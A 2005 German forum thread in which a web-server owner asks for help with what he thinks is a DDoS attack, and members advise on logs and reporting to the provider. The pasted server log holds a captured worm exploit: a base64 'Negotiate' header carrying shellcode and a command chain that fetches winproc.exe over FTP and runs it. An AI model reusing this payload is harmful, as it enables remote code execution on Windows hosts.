Ergebnis 1 bis 14 von 14

Thema: [Firewall] DDOS Attacke

  1. #1
    Herzlich willkommen! Avatar von checkercombi
    Registriert seit
    10.08.05
    Beiträge
    8

    Achtung! DDOS Attacke

    Hallo...

    habe ein kleines problem, ich werde in gewissen abständen mit ddos(Distributed Denial of Service) attacken
    überflutet nix geht mehr der rechner is absolut down.
    diese ddos angriffe richten sich doch meistens doch nur gegen grosse server!
    ich habe einen kleinen free webserver am laufen und habe eine dyndns adresse,
    kann es daran liegen? oder weil ich die namens adressen meines ips eingetragen habe?
    oder wurde mein rechner schon gekappert und wird benutzt für ddos
    ik bin ganz brav im netz kein filesharing kein esel kein edonkey
    wer kann helfen mit infos oder software tips
    ik weiss ich habe noch keinen router nur ne desktop firewall...

    thx für's lesen und für eine antwort 1000 mal danke ;-)

    achso mein system
    xp pro 2 alle patches
    kaspersky 5.0 >meldet ddos
    kaspersky antihacker 1.7
    webserver aidex
    directupdate 4.0

  2.   Anzeige

     
  3. #2
    assimiliert Avatar von Franz
    Registriert seit
    16.03.02
    Beiträge
    3.822

    AW: DDOS Attacke

    Hallo und herzlich willkommen ,

    vermutlich hast sich einfach jemand deinen PC ausgesucht.
    Als erstes blockierst du die kompletten eingehenden Verbindungen mit der Firewall.
    Soweit ich mich erinnere, kann über Kaspersky Antihacker, die IP des Angreifers ermittelt werden (Logfiles),
    auch kannst du die IP über die Netstat Liste herausbekommen.
    Diese mußt du sobald als möglich deinem Provider melden (incl. der Attacke).
    Den Provider solltest du auf jedeb Fall benachrichtigen, auch wenn du die IP nicht ermitteln kannst, denn er kann ggf. die IP sperren/blockieren.

    Good Luck

  4. #3
    Herzlich willkommen! Avatar von checkercombi
    Registriert seit
    10.08.05
    Beiträge
    8

    AW: DDOS Attacke

    danke arcanoa...
    die ip kann ich leider nicht ermitteln :-<
    an wenn soll ik ne mail schicken admin-c oder tech-c ?
    netstat liste? -p? bei angriff..

    thx
    Rob'E

  5. #4
    assimiliert Avatar von MaXg
    Registriert seit
    08.01.04
    Ort
    Dresden
    Beiträge
    4.599

    AW: DDOS Attacke

    Die IP herauszufinden dürfte schwer fallen, da für eine erfolgreiche DDoS Attacke ein vielzahl von Rechnern nötig ist. (oder ein Superrechner)

    Ein allgemeines Rezept fällt mir nicht ein.

    Manche Firewalls erkennen solche Angriffe automatisch und Blockieren, anderen muss gesagt werden "Blockiere IP wenn xx Zugriffe in xx Sekunden".

  6. #5
    assimiliert Avatar von Franz
    Registriert seit
    16.03.02
    Beiträge
    3.822

    AW: DDOS Attacke

    Die/Eine einzelne IP herauszubekommen, ist natürlich nicht einfach, gerade bei DDoS Attacken.
    Hilfreich hierbei ist, daß die Source IP, kurz bevor der Angriff gestartet wurde,
    schon deinen FTP besucht hatte, da der Angreifer herausfinden muß,
    welche Ports bei dir offen sind, du bist also schon einmal gescannt worden und das zeichnet deine FW auf.
    Nebenbei, es gibt ein paar gute Snifferprogramme.
    Ein Allheilmittel gibt es wirklich nicht, keine Frage, aber die Benachrichtigung des Providers kann Wunder bewirken.

  7. #6
    Herzlich willkommen! Avatar von checkercombi
    Registriert seit
    10.08.05
    Beiträge
    8

    AW: DDOS Attacke

    Hallo...

    danke erstmal für die schnelle hilfe! und den tip (sniffer)

    habe mein log files durch gecheckt

    es werden nicht die ports gescannt mein webserver wird benutzt!

    und hier die log mit Routenverfolgung und ip von heute.




    10.08.2005 01:52:14 Ihr Computer wurde angegriffen. Typ des Angriffs: DDoS (Distributed Denial of Service).
    10.08.2005 02:29:09 Ihr Computer wurde angegriffen. Typ des Angriffs: DDoS (Distributed Denial of Service).
    10.08.2005 07:39:47 Ihr Computer wurde angegriffen. Typ des Angriffs: DDoS (Distributed Denial of Service).
    10.08.2005 15:56:34 Ihr Computer wurde angegriffen. Typ des Angriffs: DDoS (Distributed Denial of Service).
    08-10 15:12:32 87.122.45.232 \ET / HTTP/1.0
    Host: 62.214.182.46
    Authorization: Negotiate YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQQMAI4IMVwOCBAoAkEKQQpBCkEK
    BxFTy///86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+MuSYs0iwHuMcCZrIT
    AdAfByg0Bwuv0O1QkBHXji18kAetmiwxLi18cAeuLHIsB64lcJA
    TDMcBki0AwhcB4D4tADItwHK2LaAjpCwAAAItANAV8AAAAi2g8XzH2YFbr
    DWjvzuBgaJj+ig5X/+fo7v///2NtZCAvayBlY2hvIG9wZW4gMC4wLjAuMCA2
    NzMwID4gbyZlY2hvIHVzZXIgMSAxID4+IG8gJmVjaG8gZ2V0IHdpbnByb2
    MuZXhlID4+IG8gJmVjaG8gcXVpdCA+PiBvICZmdHAgLW4gLXM6byAm
    ZGVsIC9GIC9RIG8gJndpbnByb2MuZXhlDQoAQkJCQkJCQkJCQkJCQkJCQkJC
    QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
    QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
    QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
    QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
    QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
    QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
    QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
    QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
    QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
    QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
    QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
    QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
    QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
    QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
    QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
    QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
    QkJCQkJCQiMKAwgA+A8BAPgPASOCCDkDggQRAENDQ0Mg8P1/U1ZXZoHsgA
    CJ5ujtAAAA/zZoCRLWY+j3AAAAiUYI6KIAAAD/dgRoa9AryujiAAAAiUYM6D8AA
    AD/dgRo+pcCTOjNAAAAMdtoEAQAAFP/0InDVot2EInHuRAEAADzpF4xwFBQ
    UFNQUP9WDItGCGaBxIAAX15b/+Bg6CMAAACLRCQMjVh8g0M8BYFDKAAQA
    ACBYygA8P//iwQkg8QUUDHAwzHSZP8yZIkiMdu4kEKQQjHJsQKJ3/OvdAND6/
    OJfhBkjwJYYcNgvyDw/X+LH4tGCIkHi3/4gcd4AQAAifk5GXQEiwnr+In6OVoEd
    AWLUgTr9okRiUoExkP9AWHDoQzw/X+LQByLWAiJHosAi0AIiUYEw2CLbCQoi0
    U8i1QFeAHqi0oYi1ogAevjOEmLNIsB7jH/McD8rDjgdAfBzw0Bx+v0O3wkJHXhi
    1okAetmiwxLi1ocAeuLBIsB6IlEJBxhwggA6/5DQ0NDQ0NDQ0NDQ0NDQ0NDQ
    0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0N
    DQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ
    0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0N
    DQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ
    0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0N
    DQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ
    0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0N
    DQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ
    0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0N
    DQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ
    0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0N
    DQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ
    0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0N
    DQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ
    0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0N
    DQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ
    0NDQ0NDQ0NDQ0NDI4IEIAMJAOsGkJCQkJCQA4IEEQBERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER

    ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
    ERERE==



    HTTP/1.0 200 Ok
    Server: aidex/1.1 (Win32)
    Date: Wed, 10 Aug 2005 13:12:29 GMT
    Last-Modified: Sun, 07 Aug 2005 17:15:21 GMT
    Content-Type: text/html
    Content-Length: 1707
    Connection: close

    C:\Program Files\Angry IP Scanner>tracert 87.122.45.232

    Routenverfolgung zu i577A2DE8.versanet.de [87.122.45.232] über maximal 30 Absch
    nitte:

    1 41 ms 37 ms 39 ms ber023ibr001.versatel.de [62.214.64.181]
    2 160 ms 129 ms 49 ms hhb002ibr001.versatel.de [62.214.64.29]
    3 740 ms 810 ms 980 ms i577A2DE8.versanet.de [87.122.45.232]

    Ablaufverfolgung beendet.
    .
    Press any key to close window...
    08-10 15:16:10 205.236.41.135 phpmyadmin\index.php

    C:\Program Files\Angry IP Scanner>tracert 205.236.41.135

    Routenverfolgung zu 205.236.41.135 über maximal 30 Abschnitte

    1 244 ms 520 ms 39 ms ber023ibr001.versatel.de [62.214.64.181]
    2 110 ms 499 ms 270 ms hhb2ip6.versatel.de [213.30.194.246]
    3 60 ms 59 ms 79 ms hhb2dtag.versatel.de [62.214.1.66]
    4 149 ms 149 ms 149 ms 217.239.40.78
    5 310 ms 579 ms 159 ms 62.159.61.254
    6 210 ms 158 ms 160 ms GE5-0.WANA-TOROON.IP.GROUPTELECOM.NET [66.59.191
    .57]
    7 161 ms 169 ms 158 ms 216.18.63.194
    8 160 ms 159 ms 259 ms 216.18.72.10
    9 211 ms 168 ms 159 ms h216-18-121-1.gtcust.grouptelecom.net [216.18.12
    1.1]
    10 160 ms 719 ms 159 ms nat1.securenet.net [205.236.147.233]
    11 160 ms 159 ms 158 ms 205.236.41.135

    Ablaufverfolgung beendet.
    .
    Press any key to close window...
    08-10 15:29:08 87.122.45.232 \GET / HTTP/1.0
    Host: 62.214.182.46
    Authorization: Negotiate
    YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
    BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB

    HTTP/1.0 200 Ok
    Server: aidex/1.1 (Win32)
    Date: Wed, 10 Aug 2005 13:29:07 GMT
    Last-Modified: Sun, 07 Aug 2005 17:15:21 GMT
    Content-Type: text/html
    Content-Length: 1707
    Connection: close


    C:\Program Files\Angry IP Scanner>tracert 87.122.45.232

    Routenverfolgung zu i577A2DE8.versanet.de [87.122.45.232] über maximal 30 Absch
    nitte:

    1 41 ms 37 ms 39 ms ber023ibr001.versatel.de [62.214.64.181]
    2 160 ms 129 ms 49 ms hhb002ibr001.versatel.de [62.214.64.29]
    3 740 ms 810 ms 980 ms i577A2DE8.versanet.de [87.122.45.232]

    Ablaufverfolgung beendet.
    .
    Press any key to close window...
    IP: 87.122.45.232
    ————————————————————————————————————————
    Ping: 902 ms
    ————————————————————————————————————————
    Hostname: i577A2DE8.versanet.de
    ————————————————————————————————————————
    Comp. Name: PIE-JQ4X8D5W999
    ————————————————————————————————————————
    Group Name: N/A
    ————————————————————————————————————————
    User Name: N/A
    ————————————————————————————————————————
    MAC Address: 00-53-45-00-00-00
    ————————————————————————————————————————
    TTL: 126
    ————————————————————————————————————————
    Open ports: N/A
    ————————————————————————————————————————

    kann man daraus jetzt was nützliches heraus lesen?
    bin ja kein hacker oder admin für netzwerke!

    thx
    RoB'E

  8. #7
    assimiliert Avatar von Franz
    Registriert seit
    16.03.02
    Beiträge
    3.822

    AW: DDOS Attacke

    Steht doch alles drin.

    Schick den Log an Versatel mit entsprechender Begründung.
    Sieht ganz danach aus, als ob das die Source IP ist:

    IP: 87.122.45.232
    ————————————————————————————————————————
    Ping: 902 ms
    ————————————————————————————————————————
    Hostname: i577A2DE8.versanet.de
    ————————————————————————————————————————
    Comp. Name: PIE-JQ4X8D5W999

    Die IPs, die im oberen Drittel geloggt wurden, dürften Nodes sein.

  9. #8
    Herzlich willkommen! Avatar von checkercombi
    Registriert seit
    10.08.05
    Beiträge
    8

    AW: DDOS Attacke

    hallo...
    die antwort meines isp's

    >Guten Tag,

    vielen Dank für Ihre Nachricht.

    In Übereinstimmung mit den aktuellen gesetzlichen Bestimmungen zum Thema
    Datenschutz hat Versatel seinen internen Prozess bezüglich der
    Speicherung von IP-Nummern bei der Erbringung von Telediensten
    umgestellt: Seit dem 01.09.2004 verzichten wir grundsätzlich auf die
    Speicherung von IP-Adressen.

    In Einzelfällen werden wir jedoch prozessbedingt die IP-Daten von der
    ersten Erfassung bis zur Überführung in unsere Billingsysteme kurzzeitig
    zwischenspeichern. Der Zeitraum dieser Pufferung ist auf maximal 24
    Stunden festgelegt. Die Löschung dieses Datenpuffers erfolgt
    automatisch.

    In begründeten Fallen, beispielsweise bei einem hinreichenden Verdacht
    auf eine Straftat, werden wir auf Anweisung der zuständigen
    Strafverfolgungsbehörden kundenbezogene IP-Kundendaten speichern, um
    diese Fälle verfolgen zu können. Dafür muss allerdings ein festgelegter
    Ermittlungsprozess von diesen Organen beantragt bzw. plausibel begründet
    werden.

    muss ich also ne anzeige machen!!!

    was ist aus diesem land geworden staat&polizei....
    ohne geht nix!
    na ja aber gut zu wissen das nix gespeichert wird let's hack sniff and destroy
    he he... >spass<

  10. #9
    assimiliert Avatar von Franz
    Registriert seit
    16.03.02
    Beiträge
    3.822

    AW: DDOS Attacke

    Na super.
    Die Provider haben die Möglichkeit diese Attackern zu filtern, was kein besonders großer Aufwand darstellt.
    Hast du schon mit Versatel kommuniziert?

  11. #10
    assimiliert Avatar von MaXg
    Registriert seit
    08.01.04
    Ort
    Dresden
    Beiträge
    4.599

    AW: DDOS Attacke

    Wenn das Logfile oben alles ist war das kein ernstzunehmender Angriff. Sofern man das überhaupt als Angriff bezeichnen kann....

    Am besten Schwamm drüber und vergessen -> spart unnötigen Ärger.

  12. #11
    Herzlich willkommen! Avatar von checkercombi
    Registriert seit
    10.08.05
    Beiträge
    8

    AW: [Firewall] DDOS Attacke

    hallo...
    es war ein wurm der meinen webserver durch bohren wollte ,-)

    thx

    Rob'E

  13. #12
    Brummelchen

    AW: DDOS Attacke

    War der Wurm drinnen oder draussen ?
    Ich hätte schon längt die Firewall in die Tonne getreten, die so einen
    Scheisse überhaupt noch meldet geschweige den Rechner lahmlegt.
    Sagt mal wieder soviel - Antivirensoft und Firewall taugen nur soviel,
    wie der Anwender davon versteht.

  14. #13
    Herzlich willkommen! Avatar von checkercombi
    Registriert seit
    10.08.05
    Beiträge
    8

    AW: DDOS Attacke

    HALLO...
    der wurm hat nur mal angeklopft!


    Ein Scan vom Nimda-Wurm hinterläßt im Logfile eines beliebigen Webservers, der seine Dienste auf Port 80 anbietet, folgenden Footprint:



    stay tuned...

    Rob'E

  15. #14
    bekommt Übersicht
    Registriert seit
    01.12.05
    Beiträge
    10

    AW: [Firewall] DDOS Attacke

    Hallo zusammen,

    ich benutze seit langem die Personal Firewall von Sygate und bin damit sehr zufrieden (anfangs fragt er zwar, welche Programme überhaupt ins Netz dürfen, aber mit der Zeit hat man jedem normalen Programm das Recht eingeräumt) - diese Firewall blockt zuverlässig und hat auch eine übersichtliche Log mit TraceBack u.a. - aber die Hauptsache - sie läuft einwandfrei mit meinem FTP (BPFTP) Server!

    Gruß
    Lycro

Ähnliche Themen

  1. [Hinweis] Opera 7.11 ist da!
    Von QuHno im Forum WWW News und Gerüchteküche
    Antworten: 140
    Letzter Beitrag: 23.07.03, 22:09
  2. [Hinweis] DDoS Attacken legten gestern/heute das Netz lahm
    Von Brummelchen im Forum WWW News und Gerüchteküche
    Antworten: 1
    Letzter Beitrag: 26.01.03, 09:01
  3. DDOS Attacke
    Von Wolfi im Forum WWW News und Gerüchteküche
    Antworten: 2
    Letzter Beitrag: 25.01.03, 16:39

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •